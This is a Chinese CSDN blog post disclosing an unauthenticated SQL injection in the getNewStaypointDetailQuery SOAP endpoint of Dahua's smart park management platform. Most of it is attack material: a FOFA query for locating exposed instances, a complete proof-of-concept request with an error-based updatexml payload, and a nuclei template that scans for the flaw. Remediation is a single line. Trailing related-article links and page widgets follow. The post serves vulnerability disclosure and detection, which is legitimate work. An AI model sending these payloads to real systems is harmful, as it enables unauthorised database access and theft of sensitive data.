大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入漏洞

最新推荐文章于 2024-08-23 11:09:50 发布
最新推荐文章于 2024-08-23 11:09:50 发布
阅读量333 收藏 5
点赞数 3
文章标签: sql 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/137110578
版权

1.漏洞介绍

​ 大华综合管理平台”是一款综合管理平台,具备园区运营、和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

​ 由于大华综合管理平台getNewStaypointDetailQuery接口处未对用户的输入进行过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
-

4.检索特征

FOFA:app=“dahua-智慧园区综合管理平台”

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

5.POC
POST /portal/services/carQuery/getNewStaypointDetailQuery HTTP/1.1
Host: XXXXXXXXXXXXXXX
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: text/xml;charset=UTF-8
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:car="http://carQuery.webservice.dssc.dahua.com">
<soapenv:Header/>
<soapenv:Body>
<car:getNewStaypointDetailQuery>
<!--type: string-->
<searchJson>{}</searchJson>
<!--type: string-->
<pageJson>{"orderBy":"1 and 1=updatexml(1,concat(0x7e,(select @@VERSION),0x7e),1)--"}</pageJson>
<!--type: string-->
<extend>quae divum incedo</extend>
</car:getNewStaypointDetailQuery>
</soapenv:Body>
</soapenv:Envelope>

在这里插入图片描述

nuclei检测

id: dahua-getNewStaypointDetailQuery-sqli
info:
  name: 由于大华智慧园区综合管理平台getNewStaypointDetailQuery接口处未对用户的输入进行有效的过滤
  author: test
  severity: critical
  description: 由于大华智慧园区综合管理平台getNewStaypointDetailQuery接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
  reference:
  metadata:
    verified: true
    max-request: 1
    fofa-query: FOFA:app="dahua-智慧园区综合管理平台"
  tags: sqli

requests:
  - raw:
      - |
        POST /portal/services/carQuery/getNewStaypointDetailQuery HTTP/1.1
        Host: {{Hostname}}
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Content-Type: text/xml;charset=UTF-8
        
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:car="http://carQuery.webservice.dssc.dahua.com">
        <soapenv:Header/>
        <soapenv:Body>
        <car:getNewStaypointDetailQuery>
        <!--type: string-->
        <searchJson>{}</searchJson>
        <!--type: string-->
        <pageJson>{"orderBy":"1 and 1=updatexml(1,concat(0x7e,(select @@VERSION),0x7e),1)--"}</pageJson>
        <!--type: string-->
        <extend>quae divum incedo</extend>
        </car:getNewStaypointDetailQuery>
        </soapenv:Body>
        </soapenv:Envelope>
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "XPATH syntax error"
          - "error code [1105]"
        part: body
        
      - type: status
        status:
          - 500

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入
weixin_43567873的博客
03-13 200
大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入
大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入漏洞复现
0xSec
03-13 454
​由于大华智慧园区综合管理平台getNewStaypointDetailQuery接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
【1day】复现大华智慧园区综合管理平台SQL注入漏洞
记录并分享学习安全的知识点..
08-12 923
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台SQL注入漏洞,远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
大华智慧园区综合管理平台SQL注入漏洞复现(0day)
08-11 1471
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智慧园区综合管理平台 clientServer SQL注入漏洞
qq_36334672的博客
03-28 345
大华综合管理平台”是一款综合管理平台,具备园区运营、和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。​ 由于大华综合管理平台clientServer接口处未对用户的输入进行过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
大华智慧园区综合管理平台carQuery接口SQL注入漏洞
weixin_43567873的博客
03-28 228
大华智慧园区综合管理平台carQuery接口SQL注入漏洞
0day!!大华zhyq-clientServer/getNewStaypointDetailQuery-sql注入漏洞
weixin_43167326的博客
03-12 1036
大华智慧园区综合管理平台是一个集成化的管理中枢,以智能化、数据化和高效化为核心,实现园区的全方位管理与服务。该平台集成了多种信息系统和设备,通过统一的数据接口,实现数据的互通互联和集中管理,提高了数据的利用效率。该平台运用人工智能、大数据等技术,对园区的安全、能源、环境等进行智能化监控和管理,确保园区的安全稳定与高效运行。同时,平台还具备业务流程优化和协同管理功能,能够提升园区内各部门间的协作效率。此外,大华智慧园区综合管理平台还通过大数据分析,为园区管理者提供决策支持,助力园区的可持续发展。
漏洞复现】大华-智慧园区综合管理平台-wpms-itcbulletin-sql注入
知黑而守白
02-01 134
大华智慧园区综合管理平台是一款基于云计算、大数据、人工智能等技术的智慧园区管理解决方案,可为园区提供运营管理综合安防、便捷通行、协同办公等多项功能,帮助园区实现安全等级提升、工作效率提升、管理成本下降。大华智慧园区综合管理平台 itcBulletin 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
DH-DSS-H8900智慧园区综合管理平台
03-01
DH-DSS-H8900 系列是为通用性公共建筑物提供安全和高效管理而打造的智慧园区综合管理平台,通过融合大华在安防和智能化领域的专业经验和前沿技术,集成视频,门禁、报警,停车场,考 勤,访客,可视对讲,信息发布等...
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
02-27
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
DH 软件平台 DH-DSS-H8900S2-B 智慧园区综合管理平台-智慧园区APP业务介绍和配置说明 V3.001.0000000.2(行业).docx
05-18
智慧园区综合管理平台 DH-DSS-H8900S2-B 智慧园区APP业务介绍和配置说明 DH-DSS-H8900S2-B 智慧园区综合管理平台是基于智能化和信息化的园区管理系统,旨在为园区居民和管理者提供一站式的服务平台。该平台通过集成...
智慧园区安全防范一体化管理平台建设综合解决方案.pptx
04-13
智慧园区安全防范一体化管理平台是现代工业园区安全管理的重要组成部分,它旨在通过先进的信息技术和安防设备,构建一个全面、高效、智能的安全防护体系。本方案主要针对智慧园区安全理解、现状、解决方案以及相关...
智慧园区安全防范一体化管理平台建设方案.pptx
04-15
智慧园区安全防范一体化管理平台是现代科技与安全管理的深度融合,旨在提升园区的安全水平,保障生产、生活秩序,保护环境及人员安全。以下是对这一主题的详细解析: 首先,理解智慧园区安全的含义至关重要。智慧...
SQL 时间盲注 (injection 第十六关)
baishiqi12的博客
08-20 510
SQL 注入,仅供参考
[数据库][知识]SQL Server、MySQL 和 Oracle 的默认端口和数据库链接
一名不太专业的程序员
08-17 419
请确保在实际使用中,根据您自己的数据库配置(如主机名、端口、数据库名、用户名和密码等)来调整上述连接信息。同时,确保已经添加了相应数据库的 JDBC 驱动到您的项目依赖中。SQL Server、MySQL 和 Oracle 的默认端口号、连接 URL 和驱动类名。请注意,SQL Server 的 JDBC URL 格式可能需要根据实际的数据库实例进行调整,例如,如果数据库实例名称不是默认的。参数用于指定字符集,如果需要其他字符集设置,可能需要调整这些参数。指定了连接的主机和端口,
SQL】关注者数量
最新发布
Frost_Descent的博客
08-23 361
(user_id, follower_id) 是这个表的主键(具有唯一值的列的组合)。count计数,count(follower_id) followers_count。该表包含一个关注关系中关注者和用户的编号,其中关注者关注用户。使用order by升序排列order by user_id。编写解决方案,对于每一个用户,返回该用户的关注者数量。按照用户id分组,group by user_id。查询结果的格式如下示例所示。2 的关注者有 {0,1}0 的关注者有 {1}1 的关注者有 {0}
SQL-DCL-数据控制语言
DEVIL_hym的博客
08-23 149
一、 DCL-管理用户。二、DCL-权限控制。
出现Property ‘sqlSessionFactory‘ or ‘sqlSessionTemplate‘ are requiredProperty报错
m0_74436895的博客
08-23 594
SpringBootApplication,它组合了@Configuration, @EnableAutoConfiguration, 和 @ComponentScan注解的功能。我在使用一个验证码生成的工具asy-captcha库的验证码接口遇到javax.script.ScriptEngine.eval调用失败的问题,因为engine为null。1.启动类 里配置的 (@MapperScan(“com.example.demo.dao.mapper”)),这里开始配置错了。n若有添加,尝试删除。
大华智慧园区综合管理平台rce
08-17
大华智慧园区综合管理平台(RCE)是一种基于大数据和人工智能技术的智慧园区管理解决方案。该平台集成了多个子系统,包括智能安防、能源管理、楼宇自动化、智慧交通等,旨在提供全面的园区管理和优化,促进园区的可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值